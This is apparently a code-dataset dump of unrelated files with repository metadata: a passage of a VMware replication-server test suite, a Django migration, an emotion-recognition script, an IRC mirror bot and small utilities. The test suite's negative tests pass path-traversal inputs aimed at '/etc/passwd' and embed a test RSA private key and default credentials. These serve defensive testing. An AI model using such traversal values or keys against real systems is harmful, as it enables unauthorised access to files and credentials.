CreateHostSpec("valid", "@")) # .. invalid user ExpectException(Hbr.Replica.Fault.InvalidHostSpec, storageManager.EnableHost, CreateHostSpec("valid", ":"+randPass)) # Add the valid host with an invalid password, expect failures: validHost = ExpectNoException(storageManager.EnableHost, CreateHostSpec(host, user + ":" + password + "BORKED")) if validHost.accessible: raise TestFailedExc("Valid host, with bad password, should not be accessible."); # Fixup the host (later tests expect it to be present in the server) validHost = ExpectNoException(storageManager.EnableHost, CreateHostSpec(host, user + ":" + password)) if not validHost.accessible: raise TestFailedExc("Valid host should be accessible."); return @TestFunc def TestDatastores(repManager, datastoreConf, dsMgrList): storageManager = repManager.GetStorageManager() Log("Test configured datastores") # Create a group on each datastore for datastoreMgr in dsMgrList: gspec = CreateRandomizedGroupSpec(datastoreMgr=datastoreMgr) newGroup = repManager.CreateGroup(gspec) dsList = storageManager.GetExpectedDatastores() # There should be at least one datastore for each CreateGroup above if len(dsList) != len(dsMgrList): Log("Expected datastores present...") PrintDatastores(dsList) Log("Test provided datastores...") PrintDatastores(dsMgrList) raise TestFailedExc("Expected " + str(len(dsMgrList)) + " datastores. " + "Found " + str(len(dsList)) + ".") PrintDatastores(dsList) numDs = len(dsList) # Test datastore removal (triggered by removal of all groups) Log("Test datastore removal...") for group in repManager.groups: group.Remove() dsList = storageManager.GetExpectedDatastores() newNumDs = len(dsList) if numDs != newNumDs: print("Remaining datastores...") PrintDatastores(dsList) newNumDs = numDs dsList = storageManager.GetExpectedDatastores() # Should have no datastores... numDs = len(dsList) if numDs != 0: Log("Groups that still exist") for group in repManager.groups: print(group) Log("Datastores that weren't removed...") PrintDatastores(dsList) raise TestFailedExc("Expected zero datastores. Found " + str(numDs) + ".") return @TestFunc def TestReplicationManager(repManager, datastoreConf, dsMgrList): """Test the currently implemented interfaces of the hbr.replica.ReplicationManager.""" # Test Host API interfaces TestHosts(repManager, datastoreConf) # Basic ReplicationManager API interfaces: TestGetGroups(repManager) #TestCreateGroup(100, repManager) TestCreateGroup(13, repManager) TestGetGroup(repManager) TestRemoveGroup(repManager) TestAddGroupErrorCleanup(repManager) TestUnconfigureGroup(repManager) TestRecoverGroup(repManager) TestAddRemoveDisk(repManager) # ReplicaGroup API: TestReplicaGroup(repManager) # Datastore API (removes all groups in the database!) TestDatastores(repManager, datastoreConf, dsMgrList) return # Test certificate for connecting to the server (just a # self-signed certificate with the thumbprint below and # the corresponding private key. # # Used to test login-by-SSL thumbprint functionality. testCertificate = ''' -----BEGIN CERTIFICATE----- MIIEHjCCAwagAwIBAgIIZ1NXRlNVc3kwDQYJKoZIhvcNAQEFBQAwPDE6MDgGA1UE ChMxVk13YXJlIEhvc3QtYmFzZWQgcmVwbGljYXRpb24gdGVzdGluZyBTZWxmLVNp Z25lZDAeFw0xMDAzMjEwMjI4MTVaFw0yMTA5MTkwMjI4MTVaMIIBJTELMAkGA1UE BhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExEjAQBgNVBAcTCVBhbG8gQWx0bzEU MBIGA1UEChMLVk13YXJlLCBJbmMxPDA6BgNVBAsTM1ZNd2FyZSBIb3N0LWJhc2Vk IHJlcGxpY2F0aW9uIHNlcnZlci10ZXN0aW5nIGNsaWVudDEqMCgGCSqGSIb3DQEJ ARYbc3NsLWNlcnRpZmljYXRlc0B2bXdhcmUuY29tMTswOQYDVQQDEzJWTXdhcmUg SG9zdC1iYXNlZCBSZXBsaWNhdGlvbiBzZXJ2ZXItdGVzdGluZyBjbGllbjEwMC4G CSqGSIb3DQEJAhMhMTI2OTEzODQ5NSw1NjRkNzc2MTcyNjUyMDQ5NmU2MzJlMIIB IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAokBMmaIam/yvJucCB9J7IdWn LKh3qAaZrBqXu1li9NC8tfauN5YIeQDjsbkCE2lo3uIwvZAaNYYUr/Hx5xnwrk+g /t3GM7NJJshwbfOJUih1ACpokyI5xwnQPWgtSef/rM5K2GIJPo6fsDjcLrGHhiNC KS1L2SNRd2y34m9AKjJ2JkNA02FgwWSCoWpKzVeicpR6p2zipJAWo+XgzAOs6xhe 8wo10XtO3gBBdoz0+Vfx1SDWtUVpIHdijI7p+SdNtWGPYvdfCwprD2sD4Brwh/qC LDLYnuNs4yxuu3wYoVHf77DoCAkteAzKt/hEfiEgNKplMewnt8Jt3RjCljvbIQID AQABozkwNzAJBgNVHRMEAjAAMAsGA1UdDwQEAwIEsDAdBgNVHSUEFjAUBggrBgEF BQcDAQYIKwYBBQUHAwIwDQYJKoZIhvcNAQEFBQADggEBAGqprZtEbphM7lvflOab 2kTQd5WslOnuq8snMdQpo0EwGPHTlxwEYRX7AIgtz7b7o4mJjeifyXdRxISoMRY9 /g0uSZnrdgTXR0UtZ5RhUXpYcZc36dwZ09b94HvZQc655pD55hJFjN2jP3F4yVsb Qzfa3HonJjINEWVnHarR/UrpbzuN5OZO+Chs7xqIvCr30y5LfKBYKKKoJrsxWGl5 6wTLqsUzlCdnKtvOb5dilWSxfmcf6YjkzoE4SK4koiRLoVw8ktPptNESTAA87TR9 dP1uhyZRo9cQImrAu1iOCezNQNWBwpm6/rjpbKcJsfAEu2VQlp6zJF4on8laLGSd fx0= -----END CERTIFICATE----- ''' testCertificateThumbprint = \ '02:C7:95:22:D4:5D:D3:37:FD:51:A1:DE:A4:F0:D4:AE:DB:0E:43:B7' testCertificateKey = ''' -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAokBMmaIam/yvJucCB9J7IdWnLKh3qAaZrBqXu1li9NC8tfau N5YIeQDjsbkCE2lo3uIwvZAaNYYUr/Hx5xnwrk+g/t3GM7NJJshwbfOJUih1ACpo kyI5xwnQPWgtSef/rM5K2GIJPo6fsDjcLrGHhiNCKS1L2SNRd2y34m9AKjJ2JkNA 02FgwWSCoWpKzVeicpR6p2zipJAWo+XgzAOs6xhe8wo10XtO3gBBdoz0+Vfx1SDW tUVpIHdijI7p+SdNtWGPYvdfCwprD2sD4Brwh/qCLDLYnuNs4yxuu3wYoVHf77Do CAkteAzKt/hEfiEgNKplMewnt8Jt3RjCljvbIQIDAQABAoIBABfUzet67eGfebKD F79CYSeVFBrxG7IoVgX7WfIArRI8Xptzgh9UACaVxNvjyrRDNU4XdwVA1zipWvyE 0v0YyEsyEvmcZXJOkR4LLshXjwHsQ1Mk53tE+auMe3Opi41hcCJXopKpw6XWmQnv MBgDp15Ca4NUzeE02NBrvY6avJf12ZeTDzmq3zR+H2fKhAL5DbQmd1aeidQ6UI+M JGp5AFjpjvhnlE8CZbNMr0iJztIkwJ4hE4eUIU3MH7W+IrNSRax9S7FiJKpwV7m/ TcY3K03xyNE3AAlWDDtSRcJlpjz2VoE1akF3yOD3w8UE8ll5sCV7NazF8212UqqJ /ai/G4ECgYEAz3lPtvTmqMnv35jItLyAMWsgHkJ1uK3NbdSBFf84UmjZnFcsCRug 2l8X3Jv0jhPR2PVqhE0/lGmBcHuOgqDtK3fTszhrF/Q2w3OhjZ9ZNGHIKLkGszsD Cq1hEjH+JiXZlS/wuldbyumDTOGdiWxkwFsMRIcCfmvcuA/QgbmvzekCgYEAyDM8 pwz21tVTcw8s8oW5KKjhJYcCiNVM7jnOiJAe8f5/cQR6ABGjprbn5lZWdtrKenPn 2aY1yL/Ajn/nw+iOkmV5N712CxOAkZX2QpDVsZaOgZTK/Tkpy9xeqsK9R1srLoR/ /kZnbo67k4SHvuM/ViN2JtaJs9fziTTTBNgqSHkCgYAlKaqgr+9dDobb+0cAML+Z moGvSeJCSUeBw823ffa9tDA+c9Lccsl2NBBXIMxGYsB050jEF/4qfFeGKWuWdHLn FVijQpjUOpdQnTaz4nYdDuLGgJX1pr1dvT6k/rVyadc2hNbO2fUEPJ2bONJ6GiNV 3TkuUSyeLn3jrll/0x3teQKBgBHe0PkwZRBENpC8uAxl92Mzv/UzmfxQ3e8d5du2 0axURVf3SFSdPnhxNz4OUuWFHjHUCswY1BA5XZzauft41NEokatyFAllEkLsmfDT MOALSmkyuPPlmF+EKkcf3vlxn+clGK+/5RevUfsXB274pfywaamJ2Pzet/R1bKiw CwYxAoGBAIS+xJ+emUpG82vSEAOv62V8BpOWH43BTx2KglZEshsdaQSOJvhO0u3R b2MSrEhpeKAVpcgoG2stQBtQG4tqvZvF/pWVjRol2vvzJP4lBNbul8gFv70VBU7b zJd5bHBuXckscdFBy/EA88d9YrySm26gseRFFvnFSgYz1NVfHKgp -----END RSA PRIVATE KEY----- ''' guestInfoScript = "/usr/bin/hbrsrv-guestinfo.sh" hmsThumbprintKey = "guestinfo.hbr.hms-thumbprint" srvThumbprintKey = "guestinfo.hbr.hbrsrv-thumbprint" srvRevokedKey = "guestinfo.hbr.hbrsrv-certificate-revoked" @TestFunc def TestSessionManager(repMgr, sessionMgr, localuser='root', localpasswd='vmware'): """ Test the interfaces of hbr.replica.SessionManager. Assumes the session is not yet authenticated. """ TestSessionMethodsWhileNotLoggedIn(repMgr, sessionMgr) Log("Trying simple valid login/logoff.") sessionMgr.Login(localuser, localpasswd) sessionMgr.Logoff() Log("Trying login and double-login") sessionMgr.Login(localuser, localpasswd) # double-login is a failure ExpectException(Hbr.Replica.Fault.AlreadyLoggedIn, sessionMgr.Login, localuser, localpasswd) Log("Logging off") sessionMgr.Logoff() TestSessionMethodsWhileNotLoggedIn(repMgr, sessionMgr) # # We don't validate user/pass anymore so there's no need # to test for bad user/pass combos here. # Log("Trying bad thumbprint login") RunCommand([guestInfoScript, "set", hmsThumbprintKey, "bad-login-test-thumbprint"]) sessionMgr.ReadGuestInfoKeys(); ExpectException(Hbr.Replica.Fault.InvalidLogin, sessionMgr.LoginBySSLThumbprint) Log("Trying good thumbprint login") RunCommand([guestInfoScript, "set", hmsThumbprintKey, testCertificateThumbprint]) sessionMgr.ReadGuestInfoKeys() sessionMgr.LoginBySSLThumbprint() Log("Trying double thumbprint login") ExpectException(Hbr.Replica.Fault.AlreadyLoggedIn, sessionMgr.LoginBySSLThumbprint) Log("Double log off") sessionMgr.Logoff() sessionMgr.Logoff() # should be ok Log("Forcing the server to generate new certficate") sessionMgr.LoginBySSLThumbprint() cmd = "%s get %s" % (guestInfoScript, srvThumbprintKey); (status, oldThumbprint) = commands.getstatusoutput(cmd); if status != 0: raise TestFailedExc("Error getting server thumbprint, script returned: " + str(rc)) if not re.match("[0-9A-F][0-9A-F](:[0-9A-F][0-9A-F])+$", oldThumbprint): raise TestFailedExc("Guestinfo contains invalid hbrsrv thumbprint: " + oldThumbprint); # BEWARE: this changes the *REAL* server's SSL key (we're generally # running a secondary server on the side), but this stuff is shared. # The test-hbrsrv.sh wrapper script saves/restores the original SSL # key. RunCommand([guestInfoScript, "set", srvRevokedKey, "1"]) RunCommand([guestInfoScript, "set", hmsThumbprintKey, "post-login-test-thumbprint"]) # Kick hbrsrv, disconnects all VMODL connections Log("Restarting VMODL service") sessionMgr.RestartVmodlServer() sessionMgr = None # The session manager moref (and soap stub) are useless now (status, newThumbprint) = commands.getstatusoutput(cmd); if status != 0: raise TestFailedExc("Error getting server thumbprint, script returned: " + str(rc)) if not re.match("[0-9A-F][0-9A-F](:[0-9A-F][0-9A-F])+$", oldThumbprint): raise TestFailedExc("Guestinfo contains invalid hbrsrv thumbprint: " + oldThumbprint); if oldThumbprint == newThumbprint: raise TestFailedExc("Thumbprint didn't change!") Log("Done with SessionManager tests") return @TestFunc def TestSessionMethodsWhileNotLoggedIn(repMgr, sessionMgr): """Test some APIs behavior when not logged in.""" # Valid SSL key may be left in database from startup after valid key # was found in guest-info sessionMgr.ReadGuestInfoKeys(); # GetReplicationManager requires a valid login Log("Trying methods that require a login (expecting SecurityError exceptions)") ExpectException(Vmodl.Fault.SecurityError, sessionMgr.RestartVmodlServer,) ExpectException(Vmodl.Fault.SecurityError, repMgr.GetGroup, "invalid-group-id") ExpectException(Vmodl.Fault.SecurityError, repMgr.GetServerStats,) # Test a couple methods that are allowed even if not logged in: Log("Trying always-allowed methods without login") sessionMgr.ReadGuestInfoKeys(); repMgr.GetStorageManager(); repMgr.GetServerDetails(); repMgr.GetPropertyCollector(); Log("Trying redundant logoff") sessionMgr.Logoff() # redundant logoff should be okay @TestFunc def TestSupportBundles(sMgr): """Test the support bundle APIs""" Log("Simple negative tests of supportBundleChunk") # XXX what's up with BadStatusLine here? ExpectException(Vmodl.Fault.InvalidArgument, sMgr.SupportBundleChunk, "", 0, 0) ExpectException(Vmodl.Fault.InvalidArgument, sMgr.SupportBundleChunk, "", 0, 0) ExpectException(Vmodl.Fault.InvalidArgument, sMgr.SupportBundleChunk, "", 10*100, 0) ExpectException(Vmodl.Fault.InvalidArgument, sMgr.SupportBundleChunk, "", 0, 1) ExpectException(Vmodl.Fault.InvalidArgument, sMgr.SupportBundleChunk, "../etc/passwd", 0, 0) ExpectException(Vmodl.Fault.InvalidArgument, sMgr.SupportBundleChunk, "foo/../etc/passwd", 0, 0) ExpectException(Vmodl.Fault.InvalidArgument, sMgr.SupportBundleChunk, "doesnotexist.tgz", 0, 0) Log("Generate a bundle.") sbi = sMgr.GenerateSupportBundle() chunk = sMgr.SupportBundleChunk(sbi.key, 0, 10) if len(chunk) != 10: raise TestFailedExc("Chunk should have at least 10 bytes"); sMgr.SupportBundleChunk(sbi.key, 0, 10) if len(chunk) != 10: raise TestFailedExc("(Idempotent) chunk should have at least 10 bytes"); sMgr.SupportBundleChunk(sbi.key, 0, 10*1000*1000) ExpectException(Vmodl.Fault.InvalidArgument, sMgr.SupportBundleChunk, sbi.key, 1000*1000*1000*100, 10) Log("Generate 5 bundles to force recycling.") sbiFirst = sMgr.GenerateSupportBundle() sbi = sMgr.GenerateSupportBundle() sbi = sMgr.GenerateSupportBundle() sbi = sMgr.GenerateSupportBundle() sbi = sMgr.GenerateSupportBundle() Log("Ensure old bundle keys expire.") ExpectException(Vmodl.Fault.InvalidArgument, sMgr.SupportBundleChunk, sbiFirst.key, 0, 10) return @TestFunc def TestServerManager(sMgr): """Test the hbr.replica.ServerManager API.""" TestSupportBundles(sMgr) # Tested elsewhere # sMgr.shutdown() Log("Testing logModules") for m in sMgr.GetLogModules(): print(m) # # main # def main(): # Only the datastore manager for the default # datastore is global global defaultDsMgr global testdir supportedArgs = [ (["h:", "hbrsrv="], "localhost", "hbrsrv host name", "hbrsrv"), (["p:", "port="], 8123, "VMODL port", "port"), (["hostd="], 'root:@localhost', "Hostd instance", "hostd"), (["datastore="], 'storage1', "datastore to use", "datastore"), (["testdir="], 'hbrServer-test', "test directory", "testdir"), (["auth="], 'root:vmware', "Local user:password", "auth"), ] supportedToggles = [ (["usage", "help"], False, "Show usage information", "usage"), ] args = arguments.Arguments(sys.argv, supportedArgs, supportedToggles) if args.GetKeyValue("usage"): args.Usage() return 0 hbrsrv_host = args.GetKeyValue("hbrsrv") hbrsrv_port = int(args.GetKeyValue("port")) datastores = args.GetKeyValue('datastore') hostd = args.GetKeyValue('hostd') testdir = args.GetKeyValue('testdir') (localuser, localpasswd) = args.GetKeyValue('auth').split(":") # Connect to hostd to create directories and disks: try: (host, user, password) = pyHbr.disks.ParseHostUserPass(hostd) datastoreList = datastores.split(",") defaultDsMgr = pyHbr.disks.RemoteStorage(host, user, password, datastoreList[0]) dsMgrList = [] for datastore in datastoreList: dsMgrList.append(pyHbr.disks.RemoteStorage(host, user, password, datastore)) Log("Connected to datastore: %s" % str([host, user, password, datastore])) except: Log("Failing on exception during hostd connection") traceback.print_exc(file=sys.stdout) status = "FAIL" return 1; # Create a test directories on the datastores: for datastoreMgr in dsMgrList: atexit.register(datastoreMgr.CleanupDirectory, testdir) datastoreMgr.MakeDirectory(testdir) # Add a pause before cleaning up directories in case hbr server is also cleaning something up atexit.register(time.sleep, 2) Log("Created test directories on datastores.") status = "INCOMPLETE" try: # Key may be left in guest-info from a previous run RunCommand([guestInfoScript, "set", hmsThumbprintKey, "initial-invalid"]) Log("Create SSL key/cert to use as client-side SSL thumbprint.") key_file = tempfile.gettempdir() + CreateRandomId("/key"); f = open(key_file, 'w') f.write(testCertificateKey); f.close(); atexit.register(os.unlink, key_file) cert_file = tempfile.gettempdir() + CreateRandomId("/cert"); f = open(cert_file, 'w') f.write(testCertificate); f.close(); atexit.register(os.unlink, cert_file) hbrCnx = pyHbr.servercnx.EstablishSoapCnx(host=hbrsrv_host, port=hbrsrv_port, key_file = key_file, cert_file = cert_file) Log("Connected to hbrsrv: %s:%d: %s" % (hbrsrv_host, hbrsrv_port, str(hbrCnx))) repManager = pyHbr.servercnx.HbrReplicationManager(hbrCnx) sesManager = pyHbr.servercnx.HbrSessionManager(hbrCnx) # Test session manager before authenticating, as this has the API # for auth/auth. Normal APIs are tested below TestSessionManager(repManager, sesManager, localuser, localpasswd) # re-establish connection and test the rest of the APIs # (TestSessionManager resets the VMODL server, severing the old # hbrCnx) hbrCnx = pyHbr.servercnx.EstablishSoapCnx(host=hbrsrv_host, port=hbrsrv_port, key_file = key_file, cert_file = cert_file) repManager = pyHbr.servercnx.HbrReplicationManager(hbrCnx) sesManager = pyHbr.servercnx.HbrSessionManager(hbrCnx) pyHbr.servercnx.Authenticate(sesManager, localuser, localpasswd) TestReplicationManager(repManager, (host, user, password), dsMgrList) serverManager = pyHbr.servercnx.HbrServerManager(hbrCnx) TestServerManager(serverManager) pyHbr.servercnx.ClearAuthentication(sesManager) status = "PASS" except: Log("Failing on unhandled exception: ") traceback.print_exc(file=sys.stdout) # to stdout to avoid interleaving status = "FAIL" Log("TEST RUN COMPLETE: " + status) if status != "PASS": return 1 else: return 0 # Start program if __name__ == "__main__": rc = main() sys.exit(rc)
[ "liuzhen@vmware.com" ]
liuzhen@vmware.com
b83dccd10f48a83085016bfd3c4bb439057ee36e
b39b09e4b12395c5b6001fc5ec25117bc4c2b33f
/accounts/migrations/0006_auto_20200804_1539.py
57c945be265d4761f36625318af686494c18905d
[]
no_license
Mohamed10994/Django-app
b390b84757c909a59798f20106db8fa57dc654fc
3baab92b2b08f6bd997c1963800abf3875826bf6
refs/heads/master
2022-11-27T05:12:24.593245
2020-08-10T16:36:13
2020-08-10T16:36:13
286,493,970
0
0
null
null
null
null
UTF-8
Python
false
false
415
py
# Generated by Django 3.1 on 2020-08-04 15:39 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('accounts', '0005_auto_20200804_0057'), ] operations = [ migrations.AlterField( model_name='product', name='description', field=models.CharField(blank=True, max_length=200, null=True), ), ]
[ "mohamedmostafa17994@gmail.com" ]
mohamedmostafa17994@gmail.com
d72ed1334dba43fc67a0c2ebcff6696ef89f8c84
fdeac281d8f267b4326906cac8f1fe95f4af0ee4
/divbin.py
28e7ec95cbdaa1354932c48c01361eefb90717a5
[]
no_license
yxrose/bcfr
cd37b147c318742cb227d1c08a861a20bc4c8b9c
0280ca9a9487609ae408df6bc39f4e0829304694
refs/heads/master
2023-02-24T18:10:43.783115
2023-02-15T12:24:29
2023-02-15T12:24:29
182,046,695
12
6
null
null
null
null
UTF-8
Python
false
false
1,880
py
import pandas as pd import numpy as np def crsl(bin,cdat,fdn): lss=[] ms=pd.Series([np.nan]*len(fdn),index=fdn) for sam in cdat: ix=(sam.stt<=bin[0])&(sam.end>=bin[1]) if(ix.any()): sls=sam.loc[ix,fdn].squeeze() lss.append(sls) else: lss.append(ms) return(pd.concat(lss)) def rsl(key,cdat,fdname,lines,pairs): bns=pd.Series() tls=pd.Series() for lg in cdat: bns=bns.append(lg.iloc[:,0]) tls=tls.append(lg.iloc[:,1]) ubn=pd.DataFrame({'pos':pd.unique(bns.values),'lab':1}) utl=pd.DataFrame({'pos':pd.unique(tls.values),'lab':2}) cutter=pd.concat([ubn,utl]).sort_values('pos') brg=pd.DataFrame(columns=['stt','end']) for i in range(1,cutter.shape[0]): cta=cutter.lab.iloc[i-1] ctb=cutter.lab.iloc[i] if(((cta==2)&(ctb==2))): rst=pd.Series([cutter.pos.iloc[i-1]+10000,cutter.pos.iloc[i] ],index=['stt','end']) brg=brg.append(rst,ignore_index=True) elif(((cta==1)&(ctb==1))): rst=pd.Series([cutter.pos.iloc[i-1],cutter.pos.iloc[i]-10000 ],index=['stt','end']) brg=brg.append(rst,ignore_index=True) elif((cta==1)&(ctb==2)): rst=pd.Series([cutter.pos.iloc[i-1],cutter.pos.iloc[i] ],index=['stt','end']) brg=brg.append(rst,ignore_index=True) brg.drop_duplicates(inplace=True) arg=brg.stt.tolist() arg.pop(0) arg.append(np.nan) crg=brg.end.tolist() del crg[-1] crg=[np.nan]+crg ix=(((brg.stt==crg)|(brg.stt==arg))&(brg.stt==brg.end)).tolist() iy=[not x for x in ix] brg=brg.loc[iy,:] cnb=brg.apply(crsl,cdat=cdat,fdn=fdname,axis=1) tuples=list(zip(lines,pairs,cnb.columns)) cnb.columns=pd.MultiIndex.from_tuples(tuples) return (key,[brg, cnb.stack(dropna=False)]) '''end of rsl'''
[ "noreply@github.com" ]
yxrose.noreply@github.com
f9899a02fbb389cfb24430cb2d5568571f7d1eee
53c91272444bfab92e7e89e0358047b27eab1125
/03.代码/豆瓣评论/scrapydouban/scrapydouban/main.py
14e98c156d8afabc0ee0c2f3618ec95177b648b0
[]
no_license
MrFiona/python_module_summary
2bbf9f30e0fbfe302e7e6c429754fa7bf4bfc411
4e36f6f5f6abed10fc06b16b0ed7c12cde7746d0
refs/heads/master
2021-01-20T03:54:38.105298
2019-01-07T07:28:36
2019-01-07T07:28:36
101,373,212
2
0
null
2018-04-15T05:56:45
2017-08-25T06:28:52
Jupyter Notebook
UTF-8
Python
false
false
231
py
#!/user/bin/python #-*- coding:utf-8 -*- ''' @author: 创客▪榕 @contact: chentianhao0510@126.com @file: main.py @time: 2017/5/15 15:01 ''' from scrapy import cmdline cmdline.execute('scrapy crawl DoubanBooksDetail'.split())
[ "1160177283@qq.com" ]
1160177283@qq.com
9344bb15b55230358dca9d9ffbf279968c1d1558
7d9ae6d73e567dcd3983370999f87202b42efac6
/HumanEmotionRecognitionPy/testing.py
eeaef13a260b2185b69b0e1c4164bfb745c6c996
[]
no_license
sendoggo/HumanEmotionsRecogPy
a2d873c361067469e0a31d35ef44ba6631e4191b
1ed407996944630dcb24a6dfcf98741ef51dcca3
refs/heads/main
2023-02-06T00:39:14.880978
2020-12-27T12:04:48
2020-12-27T12:04:48
324,746,462
0
0
null
null
null
null
UTF-8
Python
false
false
2,304
py
import cv2 import glob import random import numpy as np emotions = ["neutral", "anger", "contempt", "disgust", "fear", "happy", "sadness", "surprise"] #Emotion list fishface = cv2.createFisherFaceRecognizer() #Initialize fisher face classifier data = {} def get_files(emotion): #Define function to get file list, randomly shuffle it and split 80/20 files = glob.glob("MUGSet_final\\%s\\*" %emotion) random.shuffle(files) training = files[:int(len(files)*0.8)] #get first 80% of file list prediction = files[-int(len(files)*0.2):] #get last 20% of file list return training, prediction def make_sets(): training_data = [] training_labels = [] prediction_data = [] prediction_labels = [] for emotion in emotions: training, prediction = get_files(emotion) #Append data to training and prediction list, and generate labels 0-7 for item in training: image = cv2.imread(item) #open image gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) #convert to grayscale training_data.append(gray) #append image array to training data list training_labels.append(emotions.index(emotion)) for item in prediction: #repeat above process for prediction set image = cv2.imread(item) gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) prediction_data.append(gray) prediction_labels.append(emotions.index(emotion)) return training_data, training_labels, prediction_data, prediction_labels def run_recognizer(): prediction_data, prediction_labels = make_sets() print "predicting classification set" cnt = 0 correct = 0 incorrect = 0 for image in prediction_data: pred, conf = fishface.predict(image) if pred == prediction_labels[cnt]: correct += 1 cnt += 1 else: incorrect += 1 cnt += 1 return ((100*correct)/(correct + incorrect)) #Now run it fishface.load("model_MUG.xml") metascore = [] for i in range(0,10): correct = run_recognizer() print "got", correct, "percent correct!" metascore.append(correct) print "\n\nend score:", np.mean(metascore), "percent correct!"
[ "noreply@github.com" ]
sendoggo.noreply@github.com
95a6fd239a4a0467a1839ba2bd9e0c8e5ff51381
d31991e464835225abd17340b41b409d180ff639
/noetikon/files/managers.py
e2cf975193736189a24c10c04ed0e067db568a8b
[ "MIT" ]
permissive
webkom/noetikon
c6de7dd2c4cffc84ae4746561ac1da8019eda1f5
0fcede2d63a79b51bc29ea4b62d9cbc4ba993180
refs/heads/master
2021-01-16T23:57:31.425562
2016-09-12T18:20:37
2016-09-12T18:20:37
29,366,121
4
0
null
2017-03-01T14:51:59
2015-01-16T20:17:19
Python
UTF-8
Python
false
false
782
py
from basis.managers import PersistentModelManager from django.db.models import Q class DirectoryManager(PersistentModelManager): def permitted(self, user): if user.is_superuser: return self query = Q(id=-1) query |= Q(users_with_access=user) for group in user.groups.all(): query |= Q(groups_with_access=group) return self.filter(query).distinct() class FileManager(PersistentModelManager): def permitted(self, user): if user.is_superuser: return self query = Q(id=-1) query |= Q(parent_folder__users_with_access=user) for group in user.groups.all(): query |= Q(parent_folder__groups_with_access=group) return self.filter(query).distinct()
[ "me@rolflekang.com" ]
me@rolflekang.com
9c3c5e25fe1a52b699bf838f3aef770ab02e3bc3
f26dc963b2a85d9997b449cef2abb8e66eda80b4
/app.py
7e68df78fa259edabbd6eaebf492b48bb1854bfc
[]
no_license
mikecolbert/businessanalytics.me
1635c64a69050f87135ebfb65d5bca2c5c47ea0f
d2ff1b8b58edf84c332fdf97616c15a07ab71bb3
refs/heads/main
2023-04-16T19:26:47.341777
2021-04-29T18:55:59
2021-04-29T18:55:59
362,910,532
0
0
null
null
null
null
UTF-8
Python
false
false
215
py
from flask import Flask, request, render_template app = Flask(__name__) @app.route('/', methods=['GET']) def index(): return render_template('index.html') if __name__ == "__main__": app.run(debug=True)
[ "mcolbert1@live.maryville.edu" ]
mcolbert1@live.maryville.edu
d0524ffbeb76c33460c74e5044af00eab4e4d8d4
1d23096f13aef1378faeb00d610be42ec8ba2a12
/zeroth/utils/onlyonce.py
789dadb33acffd9c98a776ab8df662f195e016ee
[ "MIT" ]
permissive
njvrzm/zeroth
c6c4502c6773b04086edfa22d95b58c9ba8630aa
26c000389403cd7e54dca7dfb9364b9fe50e161a
refs/heads/master
2022-12-18T23:49:19.751055
2018-01-14T22:43:53
2018-01-14T22:43:53
116,141,302
0
0
MIT
2020-06-17T21:42:44
2018-01-03T13:42:38
Jupyter Notebook
UTF-8
Python
false
false
282
py
from functools import wraps def onlyonce(fn): """Wraps a function to run once and return the same result thereafter.""" result = [] @wraps(fn) def doit(*a, **k): if not result: result.append(fn(*a, **k)) return result[0] return doit
[ "njvrzm@gmail.com" ]
njvrzm@gmail.com
d2c049e4b584b0d9ea9fe5ab855eaf54a61e1407
6de622e922361beac91e3cfc4cd67829451bc095
/wyzepal/integrations/irc/irc-mirror.py
3201a3ce7e0af7f254b1668150be83d0bdc59548
[]
no_license
WyzePal/api
fd1f1771aa9e1bfeb5d5de102b3f525d905fae29
8646c90148885b1c4286557bd62cfcf844b9d107
refs/heads/master
2020-03-23T15:25:53.559240
2019-03-08T23:54:00
2019-03-08T23:54:00
141,747,661
0
0
null
null
null
null
UTF-8
Python
false
false
1,885
py
#!/usr/bin/env python # # EXPERIMENTAL # IRC <=> WyzePal mirroring bot # # Setup: First, you need to install python-irc version 8.5.3 # (https://github.com/jaraco/irc) from __future__ import print_function import argparse import wyzepal import sys import traceback if False: from typing import Any, Dict usage = """./irc-mirror.py --irc-server=IRC_SERVER --channel=<CHANNEL> --nick-prefix=<NICK> [optional args] Example: ./irc-mirror.py --irc-server=127.0.0.1 --channel='#test' --nick-prefix=username Specify your WyzePal API credentials and server in a ~/.wyzepalrc file or using the options. Note that "_wyzepal" will be automatically appended to the IRC nick provided Also note that at present you need to edit this code to do the WyzePal => IRC side """ if __name__ == "__main__": parser = wyzepal.add_default_arguments(argparse.ArgumentParser(usage=usage), allow_provisioning=True) parser.add_argument('--irc-server', default=None) parser.add_argument('--port', default=6667) parser.add_argument('--nick-prefix', default=None) parser.add_argument('--channel', default=None) options = parser.parse_args() # Setting the client to irc_mirror is critical for this to work options.client = "irc_mirror" wyzepal_client = wyzepal.init_from_options(options) try: from irc_mirror_backend import IRCBot except ImportError as e: traceback.print_exc() print("You have unsatisfied dependencies. Install all missing dependencies with " "{} --provision".format(sys.argv[0])) sys.exit(1) if options.irc_server is None or options.nick_prefix is None or options.channel is None: parser.error("Missing required argument") nickname = options.nick_prefix + "_wyzepal" bot = IRCBot(wyzepal_client, options.channel, nickname, options.irc_server, options.port) bot.start()
[ "dannym@wyzepal.com" ]
dannym@wyzepal.com
815b2adb791ec629b2fa794c0b5dd51d44c86c89
c5420cee98aae008cb404ace7b8d21dcdf205a69
/backend/app/constants/bank_config_list.py
823cef03626c97aace26977fb26471be31ba3636
[]
no_license
LyanJin/check-pay
2aeb81f430a26410964e979b63d20c9d5aa7d46e
ff36deb73e667de16a73b1666bbeaf28f993f944
refs/heads/master
2023-01-14T03:38:00.907488
2019-11-04T09:29:27
2019-11-04T09:29:27
219,446,460
0
0
null
2023-01-04T16:14:10
2019-11-04T07:55:33
Python
UTF-8
Python
false
false
59,843
py
